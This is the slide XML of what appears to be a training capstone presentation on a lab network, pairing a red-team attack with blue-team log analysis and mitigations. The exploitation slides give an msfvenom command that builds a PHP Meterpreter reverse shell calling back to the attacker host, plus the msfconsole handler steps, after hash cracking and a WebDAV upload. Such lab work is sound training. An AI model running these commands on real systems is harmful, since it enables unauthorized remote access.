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80" r:id="rId10"/>
    <p:sldId id="265" r:id="rId11"/>
    <p:sldId id="281" r:id="rId12"/>
    <p:sldId id="278" r:id="rId13"/>
    <p:sldId id="279" r:id="rId14"/>
    <p:sldId id="266" r:id="rId15"/>
    <p:sldId id="267" r:id="rId16"/>
    <p:sldId id="282" r:id="rId17"/>
    <p:sldId id="268" r:id="rId18"/>
    <p:sldId id="283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9144000" cy="5143500" type="screen16x9"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Inconsolata" pitchFamily="49" charset="77"/>
      <p:regular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Black" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:bold r:id="rId35"/>
      <p:italic r:id="rId36"/>
      <p:boldItalic r:id="rId37"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Light" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId38"/>
      <p:bold r:id="rId39"/>
      <p:italic r:id="rId40"/>
      <p:boldItalic r:id="rId41"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Medium" panose="02000000000000000000" pitchFamily="2" charset="0"/>
      <p:regular r:id="rId42"/>
      <p:bold r:id="rId43"/>
      <p:italic r:id="rId44"/>
      <p:boldItalic r:id="rId45"/>
    </p:embeddedFont>
    <p:embeddedFont>
      <p:font typeface="Roboto Thin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8ECC9C-6CA0-43EE-94E0-D6938346908D}">
  <a:tblStyle styleId="{928ECC9C-6CA0-43EE-94E0-D693834690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64"/>
    <p:restoredTop sz="94674"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="140" d="100"/>
          <a:sy n="140" d="100"/>
        </p:scale>
        <p:origin x="216" y="592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872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83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214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207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8557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511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ckstation.net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Capstone Engagement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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Unauthorized File Upload</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1133" name="Google Shape;1133;p63"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="425537" y="1480575"/>
            <a:ext cx="2123538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4" name="Google Shape;1134;p63"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="325374" y="1480575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lang="en-AU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Hash crack website (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://crackstation.net/</a:t>
            </a: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) to crack stolen credentials from secret_folder to connect to WebDAV server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="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AU" sz="4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Creating a PHP script and generate custom web shell with Msfvenom.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="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AU" sz="4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Upload shell on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WenDav</a:t>
            </a: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2625999" y="1480575"/>
            <a:ext cx="2167455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2522117" y="1421383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By generating to web shell, bad actors are able to execute arbitrary shell commands on the target machine</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="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AU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Uploading PHP web shell to  allow </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>and execute the shell commands on the target VM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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4870377" y="1479013"/>
            <a:ext cx="4118174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4740725" y="1349036"/>
            <a:ext cx="4247826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PHP Script Command - `msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.1.90 lport=4444 &gt;&gt; reversshell2.php`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-A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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Unauthorized File Upload</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Google Shape;1113;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BCEA553-539A-EC42-8A12-8D721CBFD08E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="219458" y="559059"/>
            <a:ext cx="88646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r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>To create the reverse shell, run this command in terminal and transfer the php file in webdav folder.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316158-A702-7945-A848-2672162F0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292" y="2719200"/>
            <a:ext cx="4491736" cy="23756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18E46A-972E-764C-9BCF-D29244C34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36" y="978425"/>
            <a:ext cx="8688832" cy="1351817"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="Google Shape;1113;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F19A7AC-8826-A349-AE63-B14F282EB56E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="199136" y="2233050"/>
            <a:ext cx="7282688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r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Run the PHP file and launch `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>` in other terminal to get access of the VM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2595266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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>Remote Code Execution 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Meterpreter used to connect on web shell.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="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AU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PHP reverse shell payload used to explore and compromise victim VM.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Able to exploit the remote code execution to open a Meterpreter shell to the target VM.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" lvl="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AU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While Meterpreter shell running, able to access full file system for exploration on 192.168.1.105 VM.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6401174" y="1481374"/>
            <a:ext cx="2614809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To launch `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a: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`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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1) Run `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0" err="1">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>msfconsole</a:t>
            </a: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` in terminal.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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2) `use exploit/multi/handler`.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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3) `set payload php/meterpreter/reverse_tcp`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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4) `set LHOST 192.168.1.90`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc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5) `exploit` or `run`</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endParaRPr lang="en-AU"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5588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[Name of Third Vulnerability]</a:t>
            </a:r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1C4FEE-8B5E-5E4A-80DD-382E8464C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14" y="1034814"/>
            <a:ext cx="8242300" cy="2590800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="Google Shape;1113;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{98B9FD48-F88C-934B-8D09-210CA8593268}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="180848" y="533700"/>
            <a:ext cx="7282688" cy="50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r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Run the PHP file and launch `</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0" err="1"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>` in other terminal to get access of the VM.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="33" name="Google Shape;1113;p62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3ABC6C1B-07A9-5A4E-B620-7FF64BED7689}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="295276" y="3467236"/>
            <a:ext cx="7282688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r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Flag File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922B92-EB88-FC4D-91A6-B1C475C8A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6" y="3946778"/>
            <a:ext cx="70231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53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14</a:t>
            </a:fld>
            <a:endParaRPr sz="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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="658368"/>
            <a:ext cx="5576250" cy="425196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5513832" y="658368"/>
            <a:ext cx="3941064" cy="4485132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endParaRPr lang="en" sz="1200" dirty="0"/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endParaRPr lang="en" sz="1200" dirty="0"/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endParaRPr lang="en" sz="1200" dirty="0"/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dirty="0"/>
              <a:t>What time did the port scan occur?</a:t>
            </a:r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AU" sz="1200" dirty="0"/>
              <a:t>The port scan began at around 20.30.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endParaRPr sz="1200" dirty="0"/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dirty="0"/>
              <a:t>How many packets were sent, and from which IP?</a:t>
            </a:r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AU" sz="1200" dirty="0"/>
              <a:t>Almost 9,446 packets able to see in second screen shot from 192.168.90 IP address.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endParaRPr lang="en-AU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A6690A-A262-E14F-9185-773147B96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" y="2936431"/>
            <a:ext cx="5955900" cy="2214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20E687-D578-B74E-A3E0-B80E7C340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" y="673481"/>
            <a:ext cx="5955900" cy="227050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2" name="Google Shape;1162;p65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="367350" y="658368"/>
            <a:ext cx="5576250" cy="425196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5513832" y="658368"/>
            <a:ext cx="3941064" cy="4485132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endParaRPr lang="en-AU" sz="1200" dirty="0"/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endParaRPr lang="en-AU" sz="1200" dirty="0"/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AU" sz="1200" dirty="0"/>
              <a:t>What indicates that this was a port scan?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endParaRPr lang="en-AU" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="323850" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>There were high spike in network traffic and all port were hits during the attack time that’s indicating a Port Scan.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="152400">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:endParaRPr lang="en-AU" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="0" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>The victim machine responded via few types of ports and 200 - OK, 401 - Unauthorized are indicating that it was an attack.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05CF37-AA77-4B44-B369-046F6057B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0" y="1322451"/>
            <a:ext cx="5576250" cy="292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31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2" name="Google Shape;1172;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248478" y="69056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-1" y="3074660"/>
            <a:ext cx="8895523" cy="184199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dirty="0"/>
              <a:t>What time did the request occur? </a:t>
            </a:r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sz="1200" dirty="0"/>
              <a:t>As per ELK screen shot, the attack started at 20.30.</a:t>
            </a:r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lang="en" sz="1200" dirty="0"/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dirty="0"/>
              <a:t>Which files were requested? </a:t>
            </a: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dirty="0"/>
              <a:t>Below are top hits directories during the attack and you can see the hits in second screen shot.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inconsolata"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folder/secret_folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inconsolata"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>http://192.168.1.105/company_folder/webdav</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-304800">
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Inconsolata"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0">
                <a:sym typeface="Inconsolata"/>
              </a:rPr>
              <a:t>http://192.168.1.105/webdav/reversshell2.php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7A52C-EC25-D945-842C-A4C029D87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9475"/>
            <a:ext cx="4323522" cy="2446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674FB5-C6F0-2647-A71A-E4ACB6CED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522" y="659475"/>
            <a:ext cx="4820478" cy="24462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2" name="Google Shape;1172;p66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="248478" y="690560"/>
            <a:ext cx="8409300" cy="2153224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99E70D-DBD7-7640-9981-F23868176D49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124239" y="2910068"/>
            <a:ext cx="889552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AU" sz="1400" dirty="0"/>
              <a:t>How many requests were made?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="4" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>15,820 request were made.</a:t>
            </a:r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lang="en-AU" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="152400">
              <a:buSzPts val="1200"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>What did they contain?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" indent="-285750">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>Secret_folder contain one file connect_to_corp and that file displayed Hash and in order how to connect to wedbav folder and this folder were requested 15,820 times.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="438150" lvl="0" indent="-285750">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>Webdav folder </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>requested </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" sz="1400" dirty="0"/>
              <a:t>28 times and it contain php revers shell file and that php file </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" dirty="0"/>
              <a:t>requested 26 times in order to connect to victim machine.</a:t>
            </a:r>
            <a:endParaRPr lang="en-AU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5CB20-0D71-5E42-8FE7-A8EE7FFFC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78" y="624276"/>
            <a:ext cx="8647044" cy="221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35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2" name="Google Shape;1182;p67"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="266766" y="674825"/>
            <a:ext cx="8409300" cy="1748336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-199578" y="2423161"/>
            <a:ext cx="5036754" cy="26001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dirty="0"/>
              <a:t>How many requests were made in the attack?</a:t>
            </a:r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sz="1200" dirty="0"/>
              <a:t>The secret_folder were requested 15,820.</a:t>
            </a:r>
            <a:endParaRPr sz="1200" dirty="0"/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endParaRPr lang="en" sz="1200" dirty="0"/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dirty="0"/>
              <a:t>How many requests had been made before the attacker </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en" sz="1200" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>discovered the password?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="0" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-AU" sz="1200" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>n secret_folder file connect_to_corp_server were request 26 times and out of 26 only 2 login attempts were successful that’s indicating the attacker discovered a password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="0" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>The high number of request made and only 2 successful attempts were made so its signifies it’s a brute-force attack.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5A62EC-9D7A-BE41-8C99-F6BE4DEC9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90" y="674825"/>
            <a:ext cx="8520618" cy="1748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7C6828-686D-3B44-8C34-5861F6666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176" y="3058923"/>
            <a:ext cx="3838890" cy="19977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2" name="Google Shape;1192;p68"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="285054" y="672272"/>
            <a:ext cx="8584626" cy="2171512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-309624" y="2777067"/>
            <a:ext cx="5791200" cy="2163392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dirty="0"/>
              <a:t>How many requests were made to this directory?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="0" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>Secret_folder were requested 15,820 and its file connect_to_corp_server were requested 26 and only 2 login attempts were successful.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="0" indent="-171450">
              <a:buSzPts val="1200"/>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" err="1"/>
              <a:t>Webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t> folder were requested for 28 times.</a:t>
            </a:r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"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sz="1200" dirty="0"/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dirty="0"/>
              <a:t>Which files were requested?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="323850" lvl="0" indent="-171450" algn="l" rtl="0"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AU" sz="1200" dirty="0"/>
              <a:t>I</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t>n </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0" err="1"/>
              <a:t>webdav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1200" dirty="0"/>
              <a:t> folder there was one php revers shell file was requested for 34 times and only 18 times were successful.</a:t>
            </a:r>
            <a:endParaRPr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1E8D58-D892-4B42-BC61-734E3C2A3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78" y="624276"/>
            <a:ext cx="8647044" cy="2219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21A862-54C3-044C-80F7-F5D397A53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3208" y="2858710"/>
            <a:ext cx="3776472" cy="208174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21</a:t>
            </a:fld>
            <a:endParaRPr sz="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port scans?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if a large amount of traffic occurs in a few seconds from a single source IP that targets multiple ports.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threshold would you set to activate this alarm?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400" dirty="0"/>
              <a:t>If more than 10 request per seconds for up to 5 seconds from IP address then alarm should be turn on.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"/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configurations can be set on the host to mitigate port scans?</a:t>
            </a:r>
            <a:endParaRPr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400" dirty="0"/>
              <a:t>Filter ICMP traffic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400" dirty="0"/>
              <a:t>Connection throttling can be enacted through the firewall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400" dirty="0"/>
              <a:t>IP Whitelist for example enable only the IP address need to access internal hosts and deny other malicious IP's.</a:t>
            </a:r>
            <a:endParaRPr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unauthorized access?</a:t>
            </a:r>
            <a:endParaRPr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400" dirty="0"/>
              <a:t>IP whitelisting authorized users.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400" dirty="0"/>
              <a:t>Alarm should be turn on when non listed IP attempt to connect.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AU" sz="1400" dirty="0"/>
              <a:t>There are no threshold, the alarm will only turn on when an incoming IP address is not on the Whitelist.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unwanted access?</a:t>
            </a:r>
            <a:endParaRPr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AU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400" dirty="0"/>
              <a:t>Restricted access by user specific to sensitive directories &amp; files.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400" dirty="0"/>
              <a:t>Also encrypting sensitive directories &amp; files, by doing this unknown user wont be able to read the data.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400" dirty="0"/>
              <a:t>Stronger usernames and password requirements for those users have access to the hidden directory &amp; files.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brute force attacks?</a:t>
            </a:r>
            <a:endParaRPr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400" dirty="0"/>
              <a:t>Alarm if any failed logins or 401 Unauthorized response from the same and whitelist IP address or from different unknown IP address.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400" dirty="0"/>
              <a:t>Setup an alarm to notify if any failed logins or 401 Unauthorized response from the server for more than 50 requests per second for 5 seconds.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"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brute force attacks?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400" dirty="0"/>
              <a:t>Extra secure password requirements for all users.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400" dirty="0"/>
              <a:t>Two-factor authentication to login on user account.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400" dirty="0"/>
              <a:t>Limit the number of attempts that a password can be tried and if after 5 times attempts from the same IP address then lockout the user.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400" dirty="0"/>
              <a:t>Implement CAPTCHAs on the server.</a:t>
            </a:r>
            <a:endParaRPr sz="1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485075"/>
            <a:ext cx="4298400" cy="354105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access to this directory?</a:t>
            </a:r>
            <a:endParaRPr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400" dirty="0"/>
              <a:t>Monitor webdav access logs on ELKs File-beat.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400" dirty="0"/>
              <a:t>Alarm if any PHP file upload or any action performed via the WebDAV protocol.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400" dirty="0"/>
              <a:t>Do not need for threshold, just fire an alarm if unknown user accesses to the webdav directory and only allow whitelist IP addresses.</a:t>
            </a:r>
            <a:endParaRPr sz="1400" dirty="0"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control access?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400" dirty="0"/>
              <a:t>Security team should install File-beat no the server host.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400" dirty="0"/>
              <a:t>Most importantly check if software patches are up to date.</a:t>
            </a:r>
            <a:endParaRPr sz="1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file uploads?</a:t>
            </a:r>
            <a:endParaRPr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400" dirty="0"/>
              <a:t>Alarm if any POST request to webdav directory from unknown IP address.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400" dirty="0"/>
              <a:t>Also alarm if any port is open.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pPr marL="285750" lvl="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AU" sz="1400" dirty="0"/>
              <a:t>Alarm should be turn on every time a of POST request on the webdav.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file uploads?</a:t>
            </a:r>
            <a:endParaRPr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400" dirty="0"/>
              <a:t>Set up read and write permission on important directories.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400" dirty="0"/>
              <a:t>Also require authentication to upload any php or exe file or can be define valid types of files for user to allow to upload.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400" dirty="0"/>
              <a:t>Create a separate storage directory for uploading files.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400" dirty="0"/>
              <a:t>Most important enable file-beat on the host server.</a:t>
            </a:r>
            <a:endParaRPr sz="1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>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2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39778" y="910475"/>
            <a:ext cx="1830622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 Range: 192.168.1.0/24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Netmask: 255.255.255.0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Gateway: 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IPv4:192.168.1.90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Kali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192.168.1.100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ELK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192.168.1.105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Capstone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Windows 10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Windows Lab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77DA4-713D-C442-AA2F-5298DD043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" y="910475"/>
            <a:ext cx="6809746" cy="389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2232951351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{928ECC9C-6CA0-43EE-94E0-D6938346908D}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 Azure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Gateway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 Team offensive attack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Vulnerable target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Stack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monitoring Kibana for incident analysis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3682346805"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="390750" y="1088407"/>
          <a:ext cx="8362500" cy="3547601"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:noFill/>
                <a:tableStyleId>{928ECC9C-6CA0-43EE-94E0-D6938346908D}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03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17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Open Port 80 for </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1200" b="1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Exposure</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="1200" i="0" dirty="0">
                        <a:effectLst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ports give attackers to access sensitive data intended only for authorized personnel and increase the risk of a data breach.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exposure compromises ad allowed the red team to find private directory with accessible files and break into the web server.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5379">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="en-AU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Unauthorized File Upload </a:t>
                      </a:r>
                      <a:endParaRPr lang="en-AU" sz="1200" i="0" dirty="0">
                        <a:effectLst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Unknow files can be uploaded to the web server by attackers.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allows attackers to upload any files that include PHP scripts as well on the server.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009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Code Execution with Command Injection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script can be use to interactive shell commands and establish a communication port channel.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allows attackers to gain access on Capstone web server through a backdoor shell.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29611" y="-187933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Exploitation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-AU" b="1" dirty="0">
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Open Port 80 for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="2000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
